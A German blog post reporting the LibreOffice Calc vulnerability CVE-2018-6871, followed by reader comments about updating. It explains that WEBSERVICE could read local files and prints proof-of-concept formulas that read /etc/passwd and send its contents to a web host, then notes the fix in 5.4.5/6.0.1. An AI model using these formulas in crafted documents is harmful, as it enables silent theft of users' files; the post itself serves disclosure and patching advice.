Remote File-Sicherheitslücke CVE-2018-6871 in LibreOffice

Nun hat es auch LibreOffice erwischt. Denn in LibreOffice kann man nun mit präparierten Tabellendokumenten mal eben so im Hintergrund Dateien ins Internet verschicken. Diese Remote Arbitrary File Disclosure-Sicherheitslücke (CVE-2018-68719 wurde in LibreOffice 5.4.5/6.0.1 geschlossen.


Anzeige

Gerade wurde das Büro-Software-Paket LibreOffice 6.0 freigegeben. Quasi die Alternative zu Microsoft Office, die dazu auch noch kostenlos ist und auf verschiedenen Betriebssystemplattformen (Linux, macOS und Windows) läuft. Die Software wird schrittweise mit diversen Features aufgerüstet – Sicherheitslücken inbegriffen. Blog-Leser Ralf H. hat mich die Nacht per Mail auf das Thema aufmerksam gemacht (danke dafür). Es gibt inzwischen auch Posts bei Hacker News, auf securelist.org und auf reddit.com.

Remote Arbitrary File Disclosure (CVE-2018-6871)

LibreOffice unterstützt die Funktion COM.MICROSOFT.WEBSERVICE aus Microsoft Office. Eine Beschreibung der Funktion, die in Microsoft Excel 2013 und 2016 verfügbar ist, findet sich auf dieser Microsoft Seite. Zweck der Funktion in Excel ist es,  Daten von einem Webservice im Internet oder Intranet zu holen. Dazu braucht der Funktion nur die URL der Ressource aus dem Internet/Intranet als Parameter übergeben zu werden.

=WEBSERVICE(“http://mywebservice.com/serviceEndpoint?searchString=Excel”)

Hier ist ein Beispiel für einen Aufruf:

=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")

Bei Microsoft findet sich in der Funktionsbeschreibung allerdings eine gewichtige Einschränkung:

For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.

Es lassen sich also keine Dateien per ftp oder file-Protokoll über diese Funktion implementieren. In LibreOffice wurden diese Restriktionen vor den Versionen 5.4.5/6.0.1 leider nicht implementiert.

Standardmäßig werden die Zellen in LibreOffice Calc nicht aktualisiert. Sofern Sie aber einen Zelltyp wie ~error angeben, wird die Zelle beim Öffnen des Dokuments aktualisiert. Dies ermöglicht es, Dateien über diese Schwachstelle zu versenden, sie @jollheef (Mikhail Klementev) von seccomp.ru auf GitHub erläutert. Um eine Datei lokal zu lesen, ließe sich in LibreOffice Calc folgende Anweisung verwenden:

=WEBSERVICE("/etc/passwd")

Anzeige

Dann reicht die nachfolgende Anweisung, um die betreffende Datei zu lesen und dann zu versenden:

=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

In anderen LibreOffice-Modulen ließe sich eine Calc-Tabelle einbetten. Dann ermöglicht die Sicherheitslücke CVE-2018-6871 beliebige Dateien im Zugriff des Benutzers zu lesen und ins Internet zu versenden.

Es ist also relativ einfach, beliebige Dateien mit Schlüsseln, Passwörtern und allem anderen zu versenden. Die Erfolgsquote liegt bei 100%, und das Ganze erfolgt für den Nutzer unsichtbar im Hintergrund – er bekommt davon nichts mit. Alles, was es braucht, ist eine präparierte Datei mit der manipulierten Calc-Tabelle. Der Exploit bzw. das Proof of Concept von @jollheef funktioniert in allen LibreOffice Versionen vor 5.4.5/6.0.1 und dazu in allen Betriebssystemen (GNU/Linux, MS Windows, MacOS etc.). Die manipulierte Calc-Tabelle kann in fast alle von LO unterstützten Formate eingebettet werden.

Fehler bei LibreOffice bekannt und gefixt

Der Fehler ist den LibreOffice-Entwicklern bekannt. Er wurde gestern auf dieser LibreOffice-Seite veröffentlicht. In den LibreOffice Versionen 5.4.5/6.0.1 ist das Problem behoben. Dort wurde die Funktion WEBSERVICE nun darauf beschränkt, auf http- und https-URLs zuzugreifen und WEBSERVICE-URLs unter die Linkmanagement-Infrastruktur von LibreOffice Calc zu stellen. Es bleibt also nur, so schnell als möglich auf die LibreOffice Versionen 5.4.5/6.0.1 und höher umzusteigen.


Anzeige
Dieser Beitrag wurde unter Office, Sicherheit abgelegt und mit , , verschlagwortet. Setze ein Lesezeichen auf den Permalink.

4 Antworten zu Remote File-Sicherheitslücke CVE-2018-6871 in LibreOffice


  1. Anzeige
  2. Martin sagt:

    Die Updatefunktion zeigt noch an: “LibreOffice 5.4 ist auf dem neuesten Stand.” Die 5.4.5 ist wohl noch nicht auf alle Server gespiegelt.

    • Remo sagt:

      Ich verlasse mich schon lange nicht mehr auf die Update Funktion in den benutzten Programmen. Die greift bei den meisten lediglich bei der Hauptversion (Major) und Nebenversion (Minor). Die Revisionsnummer (Patch Level) und die Buildnummer bleiben aussen vor. Deshalb gehe ich periodisch bzw. durch diesen Blog ;-) aufmerksam geworden, auf die jeweilige Herstellerseite und hole mir die aktuelle Version.
      Bei LibreOffice.org stehen die aktuellsten Version 5.4.5 bzw. 6.0.1 zum download bereit.

      • Martin sagt:

        Hm, es kann tatsächlich sein, dass die Updatefunktion bei LibreOffice nur auf die erste Stelle nach dem Komma schaut. Da ich aber auch gestern schon auf der Seite war und es auch gleich heruntergeladen und installiert habe, kann ich jetzt nicht mehr sagen, ob die Updatefunktion tatsächlich nur bis zur ersten Stelle nach dem Komma prüft, oder ob es daran lag, dass es noch nicht auf dem Server war, welcher über die Funktion abgefragt wird.

        Ich finde auch in den Experteneinstellungen keine URL zu einem Updateserver, weshalb ich nicht weiß, wo da nach Updates gesucht wird.

  3. Max Presser sagt:

    Fehler stecken in jeder Software – da unterscheidet sich kostenlose Software / Opensource nicht vom käuflich erworbenen Produkt.
    Beruhigend ist aber festzustellen, dass die (oft unbezahlten) Entwickler der kostenlosen Software die entdeckten Fehler im Handumdrehen fixen, während der Riese aus Redmond sich (aus nicht offengelegten Gründen, manche vermuten Überheblichkeit) hierfür bis zum nächsten monatlichen Patchday Zeit und den Anwender mit dem Risiko eines Angriffs alleine lässt; dass der Kunde recht ordentlich für die MS-Office-Suite bezahlt hat, scheint Redmond hierbei nicht zu stören.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht.